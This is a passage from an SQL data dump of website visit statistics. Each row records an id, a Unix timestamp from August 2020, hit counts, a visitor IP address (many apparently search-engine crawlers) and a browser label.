'109.108.71.11','other'),(531754,1597428275,1,1,0,0,'66.249.70.80','chrome'),(531755,1597428289,1,1,0,0,'8.29.198.27','other'),(531756,1597428333,1,1,0,0,'5.255.253.105','other'),(531757,1597428348,1,1,0,0,'91.196.178.156','chrome'),(531758,1597428631,1,1,0,0,'157.55.39.147','other'),(531759,1597428843,2,2,0,0,'66.249.70.76','chrome'),(531760,1597429102,1,1,0,0,'66.249.70.78','chrome'),(531761,1597429273,8,8,0,0,'109.108.71.11','other'),(531762,1597429722,1,1,0,0,'66.249.64.58','chrome'),(531763,1597429876,1,1,0,0,'157.55.39.175','other'),(531764,1597430077,3,3,0,0,'66.249.70.76','chrome'),(531765,1597430396,1,1,0,0,'157.55.39.121','other'),(531766,1597430453,8,8,0,0,'109.108.71.11','other'),(531767,1597430497,1,1,0,0,'66.249.70.78','chrome'),(531768,1597430657,1,1,0,0,'66.249.70.80','chrome'),(531769,1597430741,1,1,0,0,'66.249.64.60','chrome'),(531770,1597430791,1,1,0,0,'178.95.245.101','chrome'),(531771,1597431553,1,1,0,0,'157.55.39.175','other'),(531772,1597431583,8,8,0,0,'109.108.71.11','other'),(531773,1597432609,1,1,0,0,'66.249.70.76','chrome'),(531774,1597432647,3,3,0,0,'66.249.70.78','chrome'),(531775,1597432748,8,8,0,0,'109.108.71.11','other'),(531776,1597432750,1,1,0,0,'66.249.64.60','chrome'),(531777,1597432860,2,2,0,0,'66.249.70.80','chrome'),(531778,1597433890,1,1,0,0,'37.73.117.151','chrome'),(531779,1597433943,8,8,0,0,'109.108.71.11','other'),(531780,1597433998,1,1,0,0,'66.249.70.76','chrome'),(531781,1597434430,1,1,0,0,'5.45.207.92','other'),(531782,1597434985,1,1,0,0,'5.45.207.174','other'),(531783,1597435101,8,8,0,0,'109.108.71.11','other'),(531784,1597435163,2,2,0,0,'66.249.70.76','chrome'),(531785,1597435466,1,1,0,0,'66.249.70.78','chrome'),(531786,1597436239,8,8,0,0,'109.108.71.11','other'),(531787,1597436497,2,2,0,0,'66.249.70.78','chrome'),(531788,1597436855,1,1,0,0,'178.154.200.109','other'),(531789,1597436891,1,1,0,0,'5.45.207.174','other'),(531790,1597437210,2,2,0,0,'66.249.70.76','chrome'),(531791,1597437359,8,8,0,0,'109.108.71.11','other'),(531792,1597437440,1,1,0,0,'66.249.70.78','chrome'),(531793,1597438107,1,1,0,0,'176.36.31.181','chrome'),(531794,1597438486,8,8,0,0,'109.108.71.11','other'),(531795,1597438524,1,1,0,0,'66.249.70.76','chrome'),(531796,1597439128,1,1,0,0,'8.29.198.26','other'),(531797,1597439500,1,1,0,0,'207.46.13.36','other'),(531798,1597439520,1,1,0,0,'157.55.39.84','other'),(531799,1597439578,8,8,0,0,'109.108.71.11','other'),(531800,1597439757,1,1,0,0,'5.45.207.174','other'),(531801,1597440298,2,2,0,0,'66.249.70.80','chrome'),(531802,1597440689,3,3,0,0,'66.249.70.76','chrome'),(531803,1597440718,8,8,0,0,'109.108.71.11','other'),(531804,1597440863,1,1,0,0,'5.45.207.135','other'),(531805,1597440936,1,1,0,0,'66.249.64.58','chrome'),(531806,1597441515,1,1,0,0,'66.249.64.60','chrome'),(531807,1597441546,3,3,0,0,'66.249.70.78','chrome'),(531808,1597441871,8,8,0,0,'109.108.71.11','other'),(531809,1597442012,1,1,0,0,'5.45.207.174','other'),(531810,1597442362,1,1,0,0,'157.55.39.202','other'),(531811,1597442494,54,54,0,0,'173.231.59.209','other'),(531812,1597442517,1,1,0,0,'91.196.178.157','chrome'),(531813,1597442793,1,1,0,0,'157.55.39.95','other'),(531814,1597442848,1,1,0,0,'66.249.70.78','chrome'),(531815,1597442977,8,8,0,0,'109.108.71.11','other'),(531816,1597443037,1,1,0,0,'66.249.70.76','chrome'),(531817,1597443308,1,1,0,0,'207.46.13.152','other'),(531818,1597443657,4,4,0,0,'173.231.59.209','other'),(531819,1597443977,1,1,0,0,'157.55.39.202','other'),(531820,1597443999,1,1,0,0,'207.46.13.101','other'),(531821,1597444013,1,1,0,0,'93.124.41.180','chrome'),(531822,1597444084,8,8,0,0,'109.108.71.11','other'),(531823,1597444409,2,2,0,0,'66.249.70.76','chrome'),(531824,1597444524,1,1,0,0,'66.249.70.80','chrome'),(531825,1597445201,8,8,0,0,'109.108.71.11','other'),(531826,1597445427,1,1,0,0,'66.249.70.78','chrome'),(531827,1597445555,1,1,0,0,'66.249.70.80','chrome'),(531828,1597446380,8,8,0,0,'109.108.71.11','other'),(531829,1597446595,1,1,0,0,'66.249.64.58','chrome'),(531830,1597446647,1,1,0,0,'66.249.70.80','chrome'),(531831,1597446892,1,1,0,0,'17.58.99.84','other'),(531832,1597446917,1,1,0,0,'66.249.70.76','chrome'),(531833,1597447174,1,1,0,0,'5.255.253.183','other'),(531834,1597447354,1,1,0,0,'178.154.200.28','chrome'),(531835,1597447470,8,8,0,0,'109.108.71.11','other'),(531836,1597447555,1,1,0,0,'207.46.13.83','other'),(531837,1597447684,1,1,0,0,'157.55.39.121','other'),(531838,1597447705,1,1,0,0,'5.45.207.92','other'),(531839,1597447828,4,4,0,0,'66.249.70.80','chrome'),(531840,1597448579,8,8,0,0,'109.108.71.11','other'),(531841,1597449242,1,1,0,0,'157.55.39.125','other'),(531842,1597449308,1,1,0,0,'62.205.134.182','other'),(531843,1597449678,1,1,0,0,'66.249.70.80','chrome'),(531844,1597449720,8,8,0,0,'109.108.71.11','other'),(531845,1597449963,1,1,0,0,'8.29.198.27','other'),(531846,1597450028,2,2,0,0,'66.249.70.78','chrome'),(531847,1597450147,1,1,0,0,'5.45.207.174','other'),(531848,1597450224,1,1,0,0,'5.45.207.135','other'),(531849,1597450248,55,55,0,0,'173.231.59.209','other'),(531850,1597450249,1,1,0,0,'66.249.70.76','chrome'),(531851,1597450846,8,8,0,0,'109.108.71.11','other'),(531852,1597451395,1,1,0,0,'66.249.64.58','chrome'),(531853,1597451584,48,48,0,0,'173.231.59.209','other'),(531854,1597451648,1,1,0,0,'157.55.39.84','other'),(531855,1597451741,2,2,0,0,'66.249.70.78','chrome'),(531856,1597451947,8,8,0,0,'109.108.71.11','other'),(531857,1597452035,1,1,0,0,'95.220.198.252','other'),(531858,1597452045,1,1,0,0,'66.249.70.76','chrome'),(531859,1597452315,3,3,0,0,'66.249.70.80','chrome'),(531860,1597452403,1,1,0,0,'5.255.253.183','other'),(531861,1597452851,1,1,0,0,'66.249.64.60','chrome'),(531862,1597453063,8,8,0,0,'109.108.71.11','other'),(531863,1597453307,1,1,0,0,'207.46.13.152','other'),(531864,1597453576,1,1,0,0,'157.55.39.147','other'),(531865,1597453629,1,1,0,0,'66.249.70.80','chrome'),(531866,1597453643,1,1,0,0,'66.249.70.76','chrome'),(531867,1597454074,1,1,0,0,'213.180.203.75','other'),(531868,1597454176,8,8,0,0,'109.108.71.11','other'),(531869,1597454828,4,4,0,0,'66.249.70.78','chrome'),(531870,1597454842,2,2,0,0,'66.249.64.60','chrome'),(531871,1597455052,1,1,0,0,'207.46.13.152','other'),(531872,1597455071,1,1,0,0,'66.249.70.80','chrome'),(531873,1597455254,8,8,0,0,'109.108.71.11','other'),(531874,1597456337,8,8,0,0,'109.108.71.11','other'),(531875,1597456563,1,1,0,0,'66.249.70.76','chrome'),(531876,1597457442,8,8,0,0,'109.108.71.11','other'),(531877,1597457642,1,1,0,0,'5.45.207.174','other'),(531878,1597458284,1,1,0,0,'66.249.70.80','chrome'),(531879,1597458615,8,8,0,0,'109.108.71.11','other'),(531880,1597458695,1,1,0,0,'66.249.70.76','chrome'),(531881,1597458784,1,1,0,0,'66.249.64.58','chrome'),(531882,1597459198,3,3,0,0,'66.249.70.78','chrome'),(531883,1597459509,1,1,0,0,'157.55.39.232','other'),(531884,1597459718,8,8,0,0,'109.108.71.11','other'),(531885,1597460068,2,2,0,0,'66.249.70.80','chrome'),(531886,1597460629,1,1,0,0,'66.249.70.78','chrome'),(531887,1597460789,1,1,0,0,'8.29.198.26','other'),(531888,1597460798,8,8,0,0,'109.108.71.11','other'),(531889,1597460837,2,2,0,0,'66.249.70.76','chrome'),(531890,1597461292,1,1,0,0,'66.249.64.58','chrome'),(531891,1597461600,1,1,0,0,'157.55.39.230','other'),(531892,1597461857,8,8,0,0,'109.108.71.11','other'),(531893,1597462687,1,1,0,0,'66.249.70.80','chrome'),(531894,1597462699,1,1,0,0,'66.249.70.76','chrome'),(531895,1597462958,8,8,0,0,'109.108.71.11','other'),(531896,1597463092,1,1,0,0,'5.255.253.105','other'),(531897,1597463766,1,0,1,0,'66.249.70.80',''),(531898,1597463868,1,1,0,0,'5.255.253.106','other'),(531899,1597464083,8,8,0,0,'109.108.71.11','other'),(531900,1597464751,1,1,0,0,'66.249.70.80','chrome'),(531901,1597464956,4,4,0,0,'66.249.70.76','chrome'),(531902,1597465051,2,2,0,0,'5.45.207.174','other'),(531903,1597465443,1,1,0,0,'66.249.70.78','chrome'),(531904,1597465880,1,1,0,0,'66.249.70.80','chrome'),(531905,1597466269,1,1,0,0,'131.220.6.152','chrome'),(531906,1597466413,8,8,0,0,'109.108.71.11','other'),(531907,1597466520,1,1,0,0,'207.46.13.63','other'),(531908,1597466965,1,1,0,0,'66.249.70.78','chrome'),(531909,1597467459,1,1,0,0,'62.205.134.182','other'),(531910,1597467570,8,8,0,0,'109.108.71.11','other'),(531911,1597467951,1,1,0,0,'66.249.70.76','chrome'),(531912,1597468137,1,1,0,0,'66.249.70.78','chrome'),(531913,1597468142,1,1,0,0,'66.249.70.80','chrome'),(531914,1597468676,8,8,0,0,'109.108.71.11','other'),(531915,1597469141,1,1,0,0,'66.249.70.80','chrome'),(531916,1597469451,1,1,0,0,'66.249.70.78','chrome'),(531917,1597469743,1,1,0,0,'66.249.70.76','chrome'),(531918,1597469745,1,1,0,0,'5.45.207.174','other'),(531919,1597469762,8,8,0,0,'109.108.71.11','other'),(531920,1597470376,1,1,0,0,'66.249.64.58','chrome'),(531921,1597470411,2,2,0,0,'66.249.70.78','chrome'),(531922,1597470827,1,1,0,0,'66.249.70.80','chrome'),(531923,1597470872,8,8,0,0,'109.108.71.11','other'),(531924,1597470969,1,1,0,0,'66.249.70.76','chrome'),(531925,1597471389,2,2,0,0,'66.249.64.58','chrome'),(531926,1597471610,1,1,0,0,'66.249.70.78','chrome'),(531927,1597471620,1,1,0,0,'8.29.198.26','other'),(531928,1597471730,1,1,0,0,'66.249.64.56','chrome'),(531929,1597471865,3,3,0,0,'157.55.39.95','other'),(531930,1597471970,8,8,0,0,'109.108.71.11','other'),(531931,1597472416,5,5,0,0,'66.249.70.80','chrome'),(531932,1597472477,1,1,0,0,'66.249.64.58','chrome'),(531933,1597472499,2,2,0,0,'157.55.39.121','other'),(531934,1597472628,1,1,0,0,'66.249.70.76','chrome'),(531935,1597473112,8,8,0,0,'109.108.71.11','other'),(531936,1597473751,1,1,0,0,'66.249.70.76','chrome'),(531937,1597474045,1,1,0,0,'5.45.207.92','other'),(531938,1597474213,8,8,0,0,'109.108.71.11','other'),(531939,1597474632,2,2,0,0,'66.249.70.78','chrome'),(531940,1597474658,4,4,0,0,'66.249.70.76','chrome'),(531941,1597475299,8,8,0,0,'109.108.71.11','other'),(531942,1597475330,1,1,0,0,'207.46.13.36','other'),(531943,1597475526,2,2,0,0,'66.249.70.80','chrome'),(531944,1597476377,8,8,0,0,'109.108.71.11','other'),(531945,1597476464,2,2,0,0,'66.249.64.58','chrome'),(531946,1597476508,1,1,0,0,'66.249.70.76','chrome'),(531947,1597476667,2,2,0,0,'66.249.70.78','chrome'),(531948,1597476706,1,1,0,0,'207.46.13.36','other'),(531949,1597477470,8,8,0,0,'109.108.71.11','other'),(531950,1597477947,2,2,0,0,'5.45.207.174','other'),(531951,1597477957,1,1,0,0,'77.74.177.114','chrome'),(531952,1597478312,1,1,0,0,'207.46.13.111','other'),(531953,1597478415,1,1,0,0,'66.249.70.80','chrome'),(531954,1597478595,8,8,0,0,'109.108.71.11','other'),(531955,1597478753,1,1,0,0,'157.55.39.175','other'),(531956,1597479680,1,1,0,0,'157.55.39.202','other'),(531957,1597479752,8,8,0,0,'109.108.71.11','other'),(531958,1597479773,2,2,0,0,'66.249.70.76','chrome'),(531959,1597479847,1,1,0,0,'207.46.13.111','other'),(531960,1597480242,2,2,0,0,'66.249.70.78','chrome'),(531961,1597480829,1,1,0,0,'157.55.39.202','other'),(531962,1597480870,8,8,0,0,'109.108.71.11','other'),(531963,1597481465,1,1,0,0,'134.19.179.235','chrome'),(531964,1597481574,3,3,0,0,'66.249.70.78','chrome'),(531965,1597481947,8,8,0,0,'109.108.71.11','other'),(531966,1597482448,1,1,0,0,'8.29.198.27','other'),(531967,1597482473,1,1,0,0,'66.249.70.76','chrome'),(531968,1597483054,8,8,0,0,'109.108.71.11','other'),(531969,1597483587,1,1,0,0,'66.249.70.80','chrome'),(531970,1597484132,1,1,0,0,'157.55.39.84','other'),(531971,1597484153,1,1,0,0,'66.249.70.78','chrome'),(531972,1597484158,2,2,0,0,'66.249.70.76','chrome'),(531973,1597484174,8,8,0,0,'109.108.71.11','other'),(531974,1597484274,1,1,0,0,'17.58.99.84','other'),(531975,1597484525,1,1,0,0,'66.249.70.80','chrome'),(531976,1597484711,1,1,0,0,'207.46.13.111','other'),(531977,1597485270,8,8,0,0,'109.108.71.11','other'),(531978,1597485450,2,2,0,0,'66.249.64.56','chrome'),(531979,1597485646,1,1,0,0,'107.178.194.108','chrome'),(531980,1597485867,1,1,0,0,'207.46.13.24','other'),(531981,1597486213,1,1,0,0,'66.249.70.78','chrome'),(531982,1597486411,8,8,0,0,'109.108.71.11','other'),(531983,1597486463,1,1,0,0,'66.249.70.76','chrome'),(531984,1597486501,1,1,0,0,'207.46.13.36','other'),(531985,1597486971,1,1,0,0,'157.55.39.95','other'),(531986,1597487151,1,1,0,0,'207.46.13.24','other'),(531987,1597487290,1,1,0,0,'17.58.99.7','other'),(531988,1597487429,1,1,0,0,'157.55.39.202','other'),(531989,1597487458,4,4,0,0,'66.249.70.76','chrome'),(531990,1597487587,1,1,0,0,'66.249.70.78','chrome'),(531991,1597487607,8,8,0,0,'109.108.71.11','other'),(531992,1597487709,1,1,0,0,'207.46.13.36','other'),(531993,1597488455,1,1,0,0,'157.55.39.84','other'),(531994,1597488563,1,1,0,0,'157.55.39.202','other'),(531995,1597488779,8,8,0,0,'109.108.71.11','other'),(531996,1597489056,1,1,0,0,'66.249.70.78','chrome'),(531997,1597489296,2,2,0,0,'157.55.39.95','other'),(531998,1597489507,1,1,0,0,'66.249.70.76','chrome'),(531999,1597489602,1,1,0,0,'109.74.154.72','chrome'),(532000,1597489732,1,1,0,0,'66.249.70.80','chrome'),(532001,1597489897,8,8,0,0,'109.108.71.11','other'),(532002,1597490316,1,1,0,0,'88.130.60.74','other'),(532003,1597490658,1,1,0,0,'207.46.13.36','other'),(532004,1597490781,3,3,0,0,'66.249.70.78','chrome'),(532005,1597490917,6,6,0,0,'39.43.86.29','chrome'),(532006,1597490964,93,93,0,0,'81.209.177.145','other'),(532007,1597491008,8,8,0,0,'109.108.71.11','other'),(532008,1597491441,2,2,0,0,'66.249.70.76','chrome'),(532009,1597491687,1,1,0,0,'66.249.70.78','chrome'),(532010,1597491868,93,93,0,0,'81.209.177.145','other'),(532011,1597492025,1,1,0,0,'17.58.99.7','other'),(532012,1597492031,1,1,0,0,'178.154.200.28','other'),(532013,1597492097,8,8,0,0,'109.108.71.11','other'),(532014,1597492222,1,1,0,0,'5.45.207.134','other'),(532015,1597492772,94,94,0,0,'81.209.177.145','other'),(532016,1597493145,1,1,0,0,'157.55.39.147','other'),(532017,1597493164,1,1,0,0,'207.46.13.152','other'),(532018,1597493185,8,8,0,0,'109.108.71.11','other'),(532019,1597493280,1,1,0,0,'8.29.198.27','other'),(532020,1597493587,1,1,0,0,'207.46.13.36','other'),(532021,1597493680,96,96,0,0,'81.209.177.145','other'),(532022,1597494112,1,1,0,0,'66.249.70.78','chrome'),(532023,1597494304,1,1,0,0,'157.55.39.121','other'),(532024,1597494324,8,8,0,0,'109.108.71.11','other'),(532025,1597494478,1,1,0,0,'207.46.13.83','other'),(532026,1597494564,2,2,0,0,'157.55.39.147','other'),(532027,1597494591,96,96,0,0,'81.209.177.145','other'),(532028,1597494670,1,1,0,0,'66.249.70.76','chrome'),(532029,1597495099,1,1,0,0,'77.111.244.30','chrome'),(532030,1597495443,8,8,0,0,'109.108.71.11','other'),(532031,1597495493,96,96,0,0,'81.209.177.145','other'),(532032,1597496219,1,1,0,0,'66.249.70.80','chrome'),(532033,1597496404,96,96,0,0,'81.209.177.145','other'),(532034,1597496538,2,2,0,0,'66.249.70.76','chrome'),(532035,1597496557,8,8,0,0,'109.108.71.11','other'),(532036,1597496838,1,1,0,0,'31.13.127.21','other'),(532037,1597497075,2,2,0,0,'207.46.13.24','other'),(532038,1597497093,1,1,0,0,'157.55.39.84','other'),(532039,1597497285,1,1,0,0,'66.249.64.58','chrome'),(532040,1597497565,97,97,0,0,'81.209.177.145','other'),(532041,1597497596,2,1,1,0,'66.249.70.76',''),(532042,1597497677,8,8,0,0,'109.108.71.11','other'),(532043,1597498210,1,1,0,0,'207.46.13.36','other'),(532044,1597498421,1,1,0,0,'66.249.70.80','chrome'),(532045,1597498468,97,97,0,0,'81.209.177.145','other'),(532046,1597498630,1,1,0,0,'66.249.70.76','chrome'),(532047,1597498787,8,8,0,0,'109.108.71.11','other'),(532048,1597499371,99,99,0,0,'81.209.177.145','other'),(532049,1597499751,1,1,0,0,'154.51.131.142','chrome'),(532050,1597499887,8,8,0,0,'109.108.71.11','other'),(532051,1597499944,1,1,0,0,'17.58.99.7','other'),(532052,1597500279,39,39,0,0,'81.209.177.145','other'),(532053,1597500968,8,8,0,0,'109.108.71.11','other'),(532054,1597501232,1,0,1,0,'66.249.70.76',''),(532055,1597501293,2,2,0,0,'66.249.70.80','chrome'),(532056,1597501723,1,1,0,0,'91.196.178.1','chrome'),(532057,1597501753,1,1,0,0,'5.45.207.92','other'),(532058,1597502078,8,8,0,0,'109.108.71.11','other'),(532059,1597502103,1,1,0,0,'157.55.39.232','other'),(532060,1597502621,1,1,0,0,'66.249.70.76','chrome'),(532061,1597502812,1,1,0,0,'207.46.13.83','other'),(532062,1597503192,8,8,0,0,'109.108.71.11','other'),(532063,1597503505,1,1,0,0,'207.46.13.36','other'),(532064,1597503528,2,2,0,0,'66.249.70.78','chrome'),(532065,1597504109,1,1,0,0,'8.29.198.25','other'),(532066,1597504200,1,1,0,0,'66.249.70.80','chrome'),(532067,1597504279,8,8,0,0,'109.108.71.11','other'),(532068,1597504988,1,1,0,0,'209.17.96.18','other'),(532069,1597505300,1,1,0,0,'207.46.13.101','other'),(532070,1597505346,8,8,0,0,'109.108.71.11','other'),(532071,1597505355,2,2,0,0,'66.249.70.78','chrome'),(532072,1597505718,1,1,0,0,'66.249.64.60','chrome'),(532073,1597506041,3,3,0,0,'66.249.70.80','chrome'),(532074,1597506102,1,0,1,0,'66.249.70.76',''),(532075,1597506191,1,1,0,0,'66.249.64.56','chrome'),(532076,1597506419,8,8,0,0,'109.108.71.11','other'),(532077,1597507521,8,8,0,0,'109.108.71.11','other'),(532078,1597507599,1,0,1,0,'66.249.70.76',''),(532079,1597507863,1,1,0,0,'5.255.253.88','other'),(532080,1597508612,8,8,0,0,'109.108.71.11','other'),(532081,1597508617,1,1,0,0,'66.249.70.80','chrome'),(532082,1597509344,1,1,0,0,'207.46.13.101','other'),(532083,1597509685,8,8,0,0,'109.108.71.11','other'),(532084,1597509846,1,1,0,0,'66.249.70.76','chrome'),(532085,1597509855,1,1,0,0,'5.255.253.151','other'),(532086,1597509876,1,1,0,0,'178.154.200.80','other'),(532087,1597509948,1,1,0,0,'207.46.13.24','other'),(532088,1597510355,1,1,0,0,'66.249.70.80','chrome'),(532089,1597510373,1,1,0,0,'157.55.39.95','other'),(532090,1597510763,8,8,0,0,'109.108.71.11','other'),(532091,1597511132,1,1,0,0,'157.55.39.232','other'),(532092,1597511306,1,1,0,0,'66.249.64.56','chrome'),(532093,1597511856,8,8,0,0,'109.108.71.11','other'),(532094,1597511971,1,1,0,0,'88.155.12.189','chrome'),(532095,1597512062,1,1,0,0,'5.255.253.151','other'),(532096,1597512120,1,1,0,0,'69.171.249.10','other'),(532097,1597512532,1,1,0,0,'66.249.70.78','chrome'),(532098,1597512951,8,8,0,0,'109.108.71.11','other'),(532099,1597513731,3,3,0,0,'66.249.70.76','chrome'),(532100,1597513735,1,1,0,0,'5.45.207.92','other'),(532101,1597513903,1,1,0,0,'178.154.200.125','other'),(532102,1597513921,1,1,0,0,'66.249.70.80','chrome'),(532103,1597513930,1,1,0,0,'66.249.70.78','chrome'),(532104,1597514039,8,8,0,0,'109.108.71.11','other'),(532105,1597514433,1,1,0,0,'157.55.39.121','other'),(532106,1597514783,1,1,0,0,'157.55.39.232','other'),(532107,1597514941,1,1,0,0,'8.29.198.26','other'),(532108,1597515183,8,8,0,0,'109.108.71.11','other'),(532109,1597515316,1,1,0,0,'66.249.70.78','chrome'),(532110,1597515341,1,0,1,0,'66.249.70.76',''),(532111,1597515347,1,1,0,0,'157.55.39.175','other'),(532112,1597515561,1,1,0,0,'157.55.39.84','other'),(532113,1597516143,1,1,0,0,'91.196.178.1','chrome'),(532114,1597516297,8,8,0,0,'109.108.71.11','other'),(532115,1597516346,1,1,0,0,'66.249.70.78','chrome'),(532116,1597516860,2,2,0,0,'157.55.39.95','other'),(532117,1597517363,1,1,0,0,'66.249.70.80','chrome'),(532118,1597517391,8,8,0,0,'109.108.71.11','other'),(532119,1597517527,1,1,0,0,'209.17.96.58','other'),(532120,1597518501,8,8,0,0,'109.108.71.11','other'),(532121,1597518898,1,1,0,0,'66.249.70.80','chrome'),(532122,1597519405,1,1,0,0,'92.112.124.83','firefox'),(532123,1597519736,1,1,0,0,'5.255.253.136','other'),(532124,1597519763,1,1,0,0,'207.46.13.101','other'),(532125,1597519798,1,1,0,0,'176.98.70.183','chrome'),(532126,1597519801,8,8,0,0,'109.108.71.11','other'),(532127,1597519961,1,1,0,0,'207.46.13.111','other'),(532128,1597520374,1,1,0,0,'5.45.207.92','other'),(532129,1597520798,1,1,0,0,'5.255.253.136','other'),(532130,1597520930,8,8,0,0,'109.108.71.11','other'),(532131,1597521022,1,1,0,0,'66.249.70.80','chrome'),(532132,1597521029,1,0,1,0,'66.249.70.76',''),(532133,1597521050,1,1,0,0,'66.249.70.76','chrome'),(532134,1597521082,1,1,0,0,'176.36.31.181','chrome'),(532135,1597521580,1,1,0,0,'17.58.99.7','other'),(532136,1597522051,8,8,0,0,'109.108.71.11','other'),(532137,1597522097,1,1,0,0,'66.249.70.78','chrome'),(532138,1597522960,1,1,0,0,'5.45.207.75','other'),(532139,1597523128,1,1,0,0,'66.249.70.78','chrome'),(532140,1597523153,8,8,0,0,'109.108.71.11','other'),(532141,1597523593,1,1,0,0,'66.249.70.80','chrome'),(532142,1597523785,1,1,0,0,'66.249.64.56','chrome'),(532143,1597524294,8,8,0,0,'109.108.71.11','other'),(532144,1597524432,1,1,0,0,'5.255.253.136','other'),(532145,1597524608,1,1,0,0,'66.249.70.78','chrome'),(532146,1597525441,8,8,0,0,'109.108.71.11','other'),(532147,1597525461,1,1,0,0,'66.249.70.80','chrome'),(532148,1597525644,1,1,0,0,'5.45.207.174','other'),(532149,1597525722,1,1,0,0,'66.249.70.78','chrome'),(532150,1597525782,1,1,0,0,'8.29.198.27','other'),(532151,1597526386,1,1,0,0,'66.249.64.60','chrome'),(532152,1597526496,1,1,0,0,'94.130.9.183','other'),(532153,1597526510,1,1,0,0,'17.58.99.84','other'),(532154,1597526572,8,8,0,0,'109.108.71.11','other'),(532155,1597527266,1,1,0,0,'66.249.70.76','chrome'),(532156,1597527555,1,1,0,0,'5.255.253.183','other'),(532157,1597527656,1,1,0,0,'176.36.31.181','chrome'),(532158,1597527668,8,8,0,0,'109.108.71.11','other'),(532159,1597527872,1,1,0,0,'66.249.64.60','chrome'),(532160,1597528782,8,8,0,0,'109.108.71.11','other'),(532161,1597528785,2,2,0,0,'5.45.207.174','other'),(532162,1597528890,1,1,0,0,'5.255.253.136','other'),(532163,1597529385,1,1,0,0,'66.249.64.60','chrome'),(532164,1597529894,8,8,0,0,'109.108.71.11','other'),(532165,1597530718,1,1,0,0,'66.249.64.58','chrome'),(532166,1597531020,8,8,0,0,'109.108.71.11','other'),(532167,1597531102,1,1,0,0,'66.249.70.76','chrome'),(532168,1597531123,1,1,0,0,'5.45.207.174','other'),(532169,1597531841,1,1,0,0,'5.255.253.105','other'),(532170,1597532127,8,8,0,0,'109.108.71.11','other'),(532171,1597532260,1,1,0,0,'185.200.246.36','chrome'),(532172,1597532823,1,1,0,0,'66.249.70.76','chrome'),(532173,1597533274,8,8,0,0,'109.108.71.11','other'),(532174,1597533937,1,1,0,0,'66.249.70.78','chrome'),(532175,1597534356,8,8,0,0,'109.108.71.11','other'),(532176,1597534583,1,1,0,0,'178.154.200.112','other'),(532177,1597534679,1,1,0,0,'3.227.2.68','chrome'),(532178,1597534809,1,1,0,0,'66.249.70.76','chrome'),(532179,1597535202,1,1,0,0,'66.249.70.80','chrome'),(532180,1597535257,1,1,0,0,'5.45.207.174','other'),(532181,1597535436,8,8,0,0,'109.108.71.11','other'),(532182,1597535708,1,1,0,0,'62.205.134.182','other'),(532183,1597536486,8,8,0,0,'109.108.71.11','other'),(532184,1597536611,1,1,0,0,'8.29.198.27','other'),(532185,1597536848,1,1,0,0,'66.249.70.78','chrome'),(532186,1597536884,1,1,0,0,'66.249.70.76','chrome'),(532187,1597537541,8,8,0,0,'109.108.71.11','other'),(532188,1597538279,1,1,0,0,'66.249.70.80','chrome'),(532189,1597538609,8,8,0,0,'109.108.71.11','other'),(532190,1597538664,1,1,0,0,'66.249.64.58','chrome'),(532191,1597539018,5,5,0,0,'66.249.70.76','chrome'),(532192,1597539190,2,2,0,0,'66.249.70.80','chrome'),(532193,1597539438,1,1,0,0,'5.45.207.174','other'),(532194,1597539460,1,1,0,0,'52.209.178.85','chrome'),(532195,1597539688,8,8,0,0,'109.108.71.11','other'),(532196,1597540708,1,1,0,0,'66.249.70.78','chrome'),(532197,1597540763,8,8,0,0,'109.108.71.11','other'),(532198,1597541258,1,1,0,0,'5.45.207.92','other'),(532199,1597541494,1,1,0,0,'5.255.253.105','other'),(532200,1597541537,1,1,0,0,'17.58.99.84','other'),(532201,1597541548,2,2,0,0,'66.249.70.76','chrome'),(532202,1597541863,8,8,0,0,'109.108.71.11','other'),(532203,1597542418,1,1,0,0,'54.74.14.17','chrome'),(532204,1597542971,8,8,0,0,'109.108.71.11','other'),(532205,1597543482,1,1,0,0,'66.249.70.80','chrome'),(532206,1597544044,8,8,0,0,'109.108.71.11','other'),(532207,1597545140,8,8,0,0,'109.108.71.11','other'),(532208,1597545402,1,1,0,0,'66.249.70.78','chrome'),(532209,1597545756,1,1,0,0,'66.249.64.58','chrome'),(532210,1597546195,8,8,0,0,'109.108.71.11','other'),(532211,1597546694,2,2,0,0,'66.249.70.78','chrome'),(532212,1597547070,1,1,0,0,'66.249.64.56','chrome'),(532213,1597547290,8,8,0,0,'109.108.71.11','other'),(532214,1597547357,1,1,0,0,'66.249.70.76','chrome'),(532215,1597547435,1,1,0,0,'8.29.198.27','other'),(532216,1597547447,1,1,0,0,'5.45.207.174','other'),(532217,1597547924,1,1,0,0,'66.249.70.80','chrome'),(532218,1597547941,2,2,0,0,'66.249.70.78','chrome'),(532219,1597548372,8,8,0,0,'109.108.71.11','other'),(532220,1597548426,1,1,0,0,'5.255.253.126','other'),(532221,1597548488,1,1,0,0,'134.19.179.235','firefox'),(532222,1597549339,1,1,0,0,'66.249.70.78','chrome'),(532223,1597549482,8,8,0,0,'109.108.71.11','other'),(532224,1597549572,1,1,0,0,'207.46.13.73','other'),(532225,1597550278,1,1,0,0,'5.45.207.135','other'),(532226,1597550476,1,1,0,0,'213.180.203.75','other'),(532227,1597550576,8,8,0,0,'109.108.71.11','other'),(532228,1597551189,3,3,0,0,'66.249.70.76','chrome'),(532229,1597551368,1,1,0,0,'95.152.63.121','chrome'),(532230,1597552047,1,1,0,0,'66.249.70.78','chrome'),(532231,1597552658,1,1,0,0,'66.249.70.80','chrome'),(532232,1597553374,2,2,0,0,'66.249.70.76','chrome'),(532233,1597553473,8,8,0,0,'109.108.71.11','other'),(532234,1597553541,1,1,0,0,'131.220.6.152','chrome'),(532235,1597553693,2,2,0,0,'66.249.70.80','chrome'),(532236,1597554093,1,1,0,0,'62.205.134.182','other'),(532237,1597554109,2,2,0,0,'66.249.70.78','chrome'),(532238,1597554592,8,8,0,0,'109.108.71.11','other'),(532239,1597554874,2,2,0,0,'66.249.70.76','chrome'),(532240,1597554919,1,1,0,0,'178.154.200.112','other'),(532241,1597555281,1,1,0,0,'66.249.70.80','chrome'),(532242,1597555692,8,8,0,0,'109.108.71.11','other'),(532243,1597555883,2,2,0,0,'66.249.70.76','chrome'),(532244,1597556480,1,1,0,0,'66.249.70.80','chrome'),(532245,1597556591,1,1,0,0,'66.249.64.56','chrome'),(532246,1597556789,8,8,0,0,'109.108.71.11','other'),(532247,1597556830,1,1,0,0,'103.145.12.65','chrome'),(532248,1597556941,1,1,0,0,'5.255.253.77','other'),(532249,1597556990,1,1,0,0,'213.180.203.183','other'),(532250,1597557053,1,1,0,0,'213.180.203.12','other'),(532251,1597557591,3,3,0,0,'66.249.70.80','chrome'),(532252,1597557609,1,1,0,0,'66.249.64.56','chrome'),(532253,1597557861,8,8,0,0,'109.108.71.11','other'),(532254,1597557949,1,1,0,0,'66.249.70.76','chrome'),(532255,1597558266,1,1,0,0,'8.29.198.26','other'),(532256,1597558595,2,